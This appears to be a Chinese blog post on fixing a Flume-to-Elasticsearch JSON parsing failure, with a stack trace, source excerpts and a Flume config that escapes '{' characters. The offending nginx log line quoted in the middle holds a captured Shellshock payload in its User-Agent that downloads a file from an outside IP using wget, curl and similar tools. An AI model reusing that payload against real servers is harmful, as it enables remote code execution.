flume nginx 日志处理异常 JsonParseException: Unexpected character (‘(’ (code 40)): expected a valid value
最近flume处理nginx日志,每隔几天就断一次,出现JSON反序列化异常
异常堆栈:
2016/01/26 14:37:49.043 [ERROR] [] [] [SinkRunner-PollingRunner-DefaultSinkProcessor] [org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:160)] Unable to deliver event. Exception follows.
org.apache.flume.EventDeliveryException: Failed to commit transaction. Transaction rolled back.
at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:227)
at org.apache.flume.sink.DefaultSinkProcessor.process(DefaultSinkProcessor.java:68)
at org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:147)
at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.common.jackson.core.JsonParseException: Unexpected character ('(' (code 40)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')
at [Source: [B@78f004c9; line: 1, column: 2]
at org.elasticsearch.common.jackson.core.JsonParser._constructError(JsonParser.java:1487)
at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:518)
at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportUnexpectedChar(ParserMinimalBase.java:447)
at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._handleUnexpectedValue(UTF8StreamJsonParser.java:2485)
at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._nextTokenNotInObject(UTF8StreamJsonParser.java:801)
at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser.nextToken(UTF8StreamJsonParser.java:697)
at org.elasticsearch.common.xcontent.json.JsonXContentParser.nextToken(JsonXContentParser.java:51)
at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.addComplexField(ContentBuilderUtil.java:60)
at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.appendField(ContentBuilderUtil.java:47)
at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.appendHeaders(ElasticSearchLogStashEventSerializer.java:131)
at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:80)
at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:73)
at org.apache.flume.sink.elasticsearch.client.ElasticSearchTransportClient.addEvent(ElasticSearchTransportClient.java:164)
at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:189)
查找代码
builder.startObject("@fields");
for (String key : headers.keySet()) {
byte[] val = headers.get(key).getBytes(charset);
ContentBuilderUtil.appendField(builder, key, val);
}
原来是在序列化的时候失败了,ContentBuilderUtil
public static void appendField(XContentBuilder builder, String field,
byte[] data) throws IOException {
XContentType contentType = XContentFactory.xContentType(data);
if (contentType == null) {
addSimpleField(builder, field, data);
} else {
addComplexField(builder, field, contentType, data);
}
}
通过 XContentFactory.xContentType(data);
判断数据类型,从上面的异常堆栈判断应该是获取的是JSON类型,在看看里面怎么判断JSON的,有这么银行代码
// a last chance for JSON
for (int i = 0; i < length; i++) {
if (bytes.get(i) == '{') {
return XContentType.JSON;
}
}
唉,怪出问题, 在找找这种处理异常的日志内容
54.204.47.156 - - [2016-01-19T12:50:57+08:00] "GET /index.cgi HTTP/1.1" 301 184 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \x22);'" "-" "5.000" "-" "-"
原来userAgent中的字符串中有个{
,在加个替换拦截器 search_replace
agent.sources.www.type = exec
agent.sources.www.command = tail -F -n 0 /data/nginx/logs/www.longdai.com.log
agent.sources.www.restart = true
agent.sources.www.logStdErr = true
agent.sources.www.batchSize = 200
agent.sources.www.channels = fch
agent.sources.www.interceptors = cdn sr www i1
agent.sources.www.interceptors.www.type = static
agent.sources.www.interceptors.www.key = app
agent.sources.www.interceptors.www.value = www
agent.sources.www.interceptors.cdn.type = regex_filter
agent.sources.www.interceptors.cdn.regex = .*\\s+\\"ChinaCache\\"\\s+.*
agent.sources.www.interceptors.cdn.excludeEvents = true
agent.sources.www.interceptors.sr.type=search_replace
agent.sources.www.interceptors.sr.searchPattern=\\{
agent.sources.www.interceptors.sr.replaceString=%7b
agent.sources.www.interceptors.sr.charset=UTF-8
agent.sources.www.interceptors.i1.type = regex_extractor
agent.sources.www.interceptors.i1.regex = ([^\\s]*)\\s-\\s([^\\s]*)\\s\\[(.*)\\]\\s+\\"([\\S]*)\\s+([\\S]*)\\s+[\\S]*\\"\\s+(\\d+)\\s+(\\d+)\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"
agent.sources.www.interceptors.i1.serializers = s1 s2 s3 s4 s5 s6 s7 s8 s9 s10 s11 s12 s13
agent.sources.www.interceptors.i1.serializers.s1.name = remote_addr
agent.sources.www.interceptors.i1.serializers.s2.name = remote_user
agent.sources.www.interceptors.i1.serializers.s3.name = datetime
#agent.sourceswwwi.interceptors.i1.serializers.s3.type = org.apache.flume.interceptor.RegexExtractorInterceptorMillisSerializer
#agent.sourceswwwi.interceptors.i1.serializers.s3.name = timestamp
#agent.sourceswwwi.interceptors.i1.serializers.s3.pattern = yyyy-MM-dd'T'HH:mm:ssZ
agent.sources.www.interceptors.i1.serializers.s4.name = http_method
agent.sources.www.interceptors.i1.serializers.s5.name = uri
agent.sources.www.interceptors.i1.serializers.s6.name = status
agent.sources.www.interceptors.i1.serializers.s7.name = body_length
agent.sources.www.interceptors.i1.serializers.s8.name = http_referer
agent.sources.www.interceptors.i1.serializers.s9.name = user_agent
agent.sources.www.interceptors.i1.serializers.s10.name = http_x_forwarded_for
agent.sources.www.interceptors.i1.serializers.s11.name = request_time
agent.sources.www.interceptors.i1.serializers.s12.name = upstream_addr
agent.sources.www.interceptors.i1.serializers.s13.name = upstream_response_time
agent.sources.www.interceptors.i2.type = timestamp
agent.sources.www.interceptors.i3.type = host
agent.sources.www.interceptors.i3.hostHeader = hostname
agent.sinks.elasticSearch.type = org.apache.flume.sink.elasticsearch.ElasticSearchSink
agent.sinks.elasticSearch.channel = fch
agent.sinks.elasticSearch.batchSize = 2000
agent.sinks.elasticSearch.hostNames = 172.16.0.18:9300
agent.sinks.elasticSearch.indexName = nginx
agent.sinks.elasticSearch.indexType = nginx
agent.sinks.elasticSearch.clusterName = longdai
agent.sinks.elasticSearch.client = transport
agent.sinks.elasticSearch.serializer = org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer
flume处理nginx日志的配置可以查看这里